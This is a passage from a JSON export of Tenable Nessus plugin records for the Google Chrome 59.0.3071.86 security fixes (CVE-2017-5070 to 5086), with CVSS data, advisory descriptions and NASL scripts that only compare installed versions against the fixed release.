print preview functionality that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-5073)\n\n - A use-after-free error exists in the Apps Bluetooth component that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-5074)\n\n - An unspecified flaw exists in the CSP reporting component that allows an unauthenticated, remote attacker to disclose sensitive information.\n (CVE-2017-5075)\n\n - An overflow condition exists in the Google Skia component due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-5077)\n\n - An unspecified flaw exists in the mailto handling functionality that allows an unauthenticated, remote attacker to inject arbitrary commands. (CVE-2017-5078)\n\n - An unspecified flaw exists in Blink that allows an attacker to spoof components in the user interface.\n (CVE-2017-5079)\n\n - A use-after-free free error exists in the credit card autofill functionality that allows an attacker to have an unspecified impact. (CVE-2017-5080)\n\n - An unspecified flaw exists that allows an unauthenticated, remote attacker to bypass extension verification mechanisms. (CVE-2017-5081)\n\n - An unspecified flaw exists in the credit card editor view functionality that allows an unauthenticated, remote attacker to disclose credit card information.\n (CVE-2017-5082)\n\n - An unspecified flaw exists in the WebUI pages component that allows an unauthenticated, remote attacker to execute arbitrary JavaScript code. (CVE-2017-5085)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-08T00:00:00", "type": "nessus", "title": "Google Chrome < 59.0.3071.86 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5085", "CVE-2017-5086"], "modified": "2022-06-08T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_59_0_3071_86.NASL", "href": "https://www.tenable.com/plugins/nessus/100679", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100679);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n \"CVE-2017-5072\",\n \"CVE-2017-5073\",\n \"CVE-2017-5074\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5077\",\n \"CVE-2017-5078\",\n \"CVE-2017-5079\",\n \"CVE-2017-5080\",\n \"CVE-2017-5081\",\n \"CVE-2017-5082\",\n \"CVE-2017-5083\",\n \"CVE-2017-5085\",\n \"CVE-2017-5086\"\n );\n script_bugtraq_id(98861);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Google Chrome < 59.0.3071.86 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 59.0.3071.86. It is, therefore, affected by the following\nvulnerabilities :\n\n - A type confusion error exists in the Google V8 component\n that allows an unauthenticated, remote attacker to\n execute arbitrary code. (CVE-2017-5070)\n\n - An out-of-bounds read error exists in the Google V8\n component that allows an unauthenticated, remote\n attacker to cause a denial of service condition or the\n disclosure of sensitive information. (CVE-2017-5071)\n\n - Multiple unspecified flaws exist in the Omnibox\n component that allows an attacker to spoof the address\n in the address bar. (CVE-2017-5072, CVE-2017-5076,\n CVE-2017-5083, CVE-2017-5086)\n\n - A use-after-free error exists in the print preview\n functionality that allows an unauthenticated, remote\n attacker to execute arbitrary code. (CVE-2017-5073)\n\n - A use-after-free error exists in the Apps Bluetooth\n component that allows an unauthenticated, remote\n attacker to execute arbitrary code. (CVE-2017-5074)\n\n - An unspecified flaw exists in the CSP reporting\n component that allows an unauthenticated, remote\n attacker to disclose sensitive information.\n (CVE-2017-5075)\n\n - An overflow condition exists in the Google Skia\n component due to improper validation of user-supplied\n input. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to cause a denial of service condition or the\n execution of arbitrary code. (CVE-2017-5077)\n\n - An unspecified flaw exists in the mailto handling\n functionality that allows an unauthenticated, remote\n attacker to inject arbitrary commands. (CVE-2017-5078)\n\n - An unspecified flaw exists in Blink that allows an\n attacker to spoof components in the user interface.\n (CVE-2017-5079)\n\n - A use-after-free free error exists in the credit card\n autofill functionality that allows an attacker to have\n an unspecified impact. (CVE-2017-5080)\n\n - An unspecified flaw exists that allows an\n unauthenticated, remote attacker to bypass extension\n verification mechanisms. (CVE-2017-5081)\n\n - An unspecified flaw exists in the credit card editor\n view functionality that allows an unauthenticated,\n remote attacker to disclose credit card information.\n (CVE-2017-5082)\n\n - An unspecified flaw exists in the WebUI pages component\n that allows an unauthenticated, remote attacker to\n execute arbitrary JavaScript code. (CVE-2017-5085)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2017/06/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6dde93a4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 59.0.3071.86 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5080\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'59.0.3071.86', severity:SECURITY_WARNING);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:29:16", "description": "The version of Google Chrome installed on the remote macOS or Mac OS X host is prior to 59.0.3071.86. It is, therefore, affected by the following vulnerabilities :\n\n - A type confusion error exists in the Google V8 component that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-5070)\n\n - An out-of-bounds read error exists in the Google V8 component that allows an unauthenticated, remote attacker to cause a denial of service condition or the disclosure of sensitive information. (CVE-2017-5071)\n\n - Multiple unspecified flaws exist in the Omnibox component that allows an attacker to spoof the address in the address bar. (CVE-2017-5072, CVE-2017-5076, CVE-2017-5083, CVE-2017-5086)\n\n - A use-after-free error exists in the print preview functionality that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-5073)\n\n - A use-after-free error exists in the Apps Bluetooth component that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-5074)\n\n - An unspecified flaw exists in the CSP reporting component that allows an unauthenticated, remote attacker to disclose sensitive information.\n (CVE-2017-5075)\n\n - An overflow condition exists in the Google Skia component due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-5077)\n\n - An unspecified flaw exists in the mailto handling functionality that allows an unauthenticated, remote attacker to inject arbitrary commands. (CVE-2017-5078)\n\n - An unspecified flaw exists in Blink that allows an attacker to spoof components in the user interface.\n (CVE-2017-5079)\n\n - A use-after-free free error exists in the credit card autofill functionality that allows an attacker to have an unspecified impact. (CVE-2017-5080)\n\n - An unspecified flaw exists that allows an unauthenticated, remote attacker to bypass extension verification mechanisms. (CVE-2017-5081)\n\n - An unspecified flaw exists in the credit card editor view functionality that allows an unauthenticated, remote attacker to disclose credit card information.\n (CVE-2017-5082)\n\n - An unspecified flaw exists in the WebUI pages component that allows an unauthenticated, remote attacker to execute arbitrary JavaScript code. (CVE-2017-5085)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-08T00:00:00", "type": "nessus", "title": "Google Chrome < 59.0.3071.86 Multiple Vulnerabilities (macOS)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5085", "CVE-2017-5086"], "modified": "2022-06-08T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_59_0_3071_86.NASL", "href": "https://www.tenable.com/plugins/nessus/100680", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100680);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n \"CVE-2017-5072\",\n \"CVE-2017-5073\",\n \"CVE-2017-5074\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5077\",\n \"CVE-2017-5078\",\n \"CVE-2017-5079\",\n \"CVE-2017-5080\",\n \"CVE-2017-5081\",\n \"CVE-2017-5082\",\n \"CVE-2017-5083\",\n \"CVE-2017-5085\",\n \"CVE-2017-5086\"\n );\n script_bugtraq_id(98861);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Google Chrome < 59.0.3071.86 Multiple Vulnerabilities (macOS)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS or Mac OS X\nhost is prior to 59.0.3071.86. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A type confusion error exists in the Google V8 component\n that allows an unauthenticated, remote attacker to\n execute arbitrary code. (CVE-2017-5070)\n\n - An out-of-bounds read error exists in the Google V8\n component that allows an unauthenticated, remote\n attacker to cause a denial of service condition or the\n disclosure of sensitive information. (CVE-2017-5071)\n\n - Multiple unspecified flaws exist in the Omnibox\n component that allows an attacker to spoof the address\n in the address bar. (CVE-2017-5072, CVE-2017-5076,\n CVE-2017-5083, CVE-2017-5086)\n\n - A use-after-free error exists in the print preview\n functionality that allows an unauthenticated, remote\n attacker to execute arbitrary code. (CVE-2017-5073)\n\n - A use-after-free error exists in the Apps Bluetooth\n component that allows an unauthenticated, remote\n attacker to execute arbitrary code. (CVE-2017-5074)\n\n - An unspecified flaw exists in the CSP reporting\n component that allows an unauthenticated, remote\n attacker to disclose sensitive information.\n (CVE-2017-5075)\n\n - An overflow condition exists in the Google Skia\n component due to improper validation of user-supplied\n input. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to cause a denial of service condition or the\n execution of arbitrary code. (CVE-2017-5077)\n\n - An unspecified flaw exists in the mailto handling\n functionality that allows an unauthenticated, remote\n attacker to inject arbitrary commands. (CVE-2017-5078)\n\n - An unspecified flaw exists in Blink that allows an\n attacker to spoof components in the user interface.\n (CVE-2017-5079)\n\n - A use-after-free free error exists in the credit card\n autofill functionality that allows an attacker to have\n an unspecified impact. (CVE-2017-5080)\n\n - An unspecified flaw exists that allows an\n unauthenticated, remote attacker to bypass extension\n verification mechanisms. (CVE-2017-5081)\n\n - An unspecified flaw exists in the credit card editor\n view functionality that allows an unauthenticated,\n remote attacker to disclose credit card information.\n (CVE-2017-5082)\n\n - An unspecified flaw exists in the WebUI pages component\n that allows an unauthenticated, remote attacker to\n execute arbitrary JavaScript code. (CVE-2017-5085)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2017/06/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6dde93a4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 59.0.3071.86 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5080\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'59.0.3071.86', severity:SECURITY_WARNING);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:28:56", "description": "Chromium 59. Add smaller logo files. Fix lots of security bugs:\nSecurity fix for CVE-2017-5070, CVE-2017-5071, CVE-2017-5072, CVE-2017-5073, CVE-2017-5074, CVE-2017-5075, CVE-2017-5086, CVE-2017-5076, CVE-2017-5077, CVE-2017-5078, CVE-2017-5079, CVE-2017-5080, CVE-2017-5081, CVE-2017-5082, CVE-2017-5083, CVE-2017-5085\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-30T00:00:00", "type": "nessus", "title": "Fedora 25 : 1:chromium-native_client (2017-a66e2c5b62)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5085", "CVE-2017-5086"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:1:chromium-native_client", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-A66E2C5B62.NASL", "href": "https://www.tenable.com/plugins/nessus/101124", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-a66e2c5b62.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101124);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n \"CVE-2017-5072\",\n \"CVE-2017-5073\",\n \"CVE-2017-5074\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5077\",\n \"CVE-2017-5078\",\n \"CVE-2017-5079\",\n \"CVE-2017-5080\",\n \"CVE-2017-5081\",\n \"CVE-2017-5082\",\n \"CVE-2017-5083\",\n \"CVE-2017-5085\",\n \"CVE-2017-5086\"\n );\n script_xref(name:\"FEDORA\", value:\"2017-a66e2c5b62\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Fedora 25 : 1:chromium-native_client (2017-a66e2c5b62)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Chromium 59. Add smaller logo files. Fix lots of security bugs:\nSecurity fix for CVE-2017-5070, CVE-2017-5071, CVE-2017-5072,\nCVE-2017-5073, CVE-2017-5074, CVE-2017-5075, CVE-2017-5086,\nCVE-2017-5076, CVE-2017-5077, CVE-2017-5078, CVE-2017-5079,\nCVE-2017-5080, CVE-2017-5081, CVE-2017-5082, CVE-2017-5083,\nCVE-2017-5085\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-a66e2c5b62\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected 1:chromium-native_client package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:chromium-native_client\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"chromium-native_client-59.0.3071.86-1.20170607gitaac1de2.fc25\", epoch:\"1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:chromium-native_client\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:29:26", "description": "An update for chromium-browser is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 59.0.3071.86.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Chromium to crash, execute arbitrary code, or disclose sensitive information when visited by the victim. (CVE-2017-5070, CVE-2017-5071, CVE-2017-5072, CVE-2017-5073, CVE-2017-5074, CVE-2017-5075, CVE-2017-5076, CVE-2017-5077, CVE-2017-5078, CVE-2017-5079, CVE-2017-5080, CVE-2017-5081, CVE-2017-5086, CVE-2017-5082, CVE-2017-5083, CVE-2017-5085)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-07T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2017:1399)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5085", "CVE-2017-5086"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser", "p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2017-1399.NASL", "href": "https://www.tenable.com/plugins/nessus/100660", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1399. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100660);\n script_version(\"3.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n \"CVE-2017-5072\",\n \"CVE-2017-5073\",\n \"CVE-2017-5074\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5077\",\n \"CVE-2017-5078\",\n \"CVE-2017-5079\",\n \"CVE-2017-5080\",\n \"CVE-2017-5081\",\n \"CVE-2017-5082\",\n \"CVE-2017-5083\",\n \"CVE-2017-5085\",\n \"CVE-2017-5086\"\n );\n script_xref(name:\"RHSA\", value:\"2017:1399\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2017:1399)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 59.0.3071.86.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web\ncontent. A web page containing malicious content could cause Chromium\nto crash, execute arbitrary code, or disclose sensitive information\nwhen visited by the victim. (CVE-2017-5070, CVE-2017-5071,\nCVE-2017-5072, CVE-2017-5073, CVE-2017-5074, CVE-2017-5075,\nCVE-2017-5076, CVE-2017-5077, CVE-2017-5078, CVE-2017-5079,\nCVE-2017-5080, CVE-2017-5081, CVE-2017-5086, CVE-2017-5082,\nCVE-2017-5083, CVE-2017-5085)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://chromereleases.googleblog.com/2017/06/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017:1399\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5070\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5071\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5072\");\n script_set_attribute(attribute:\"see_also\", 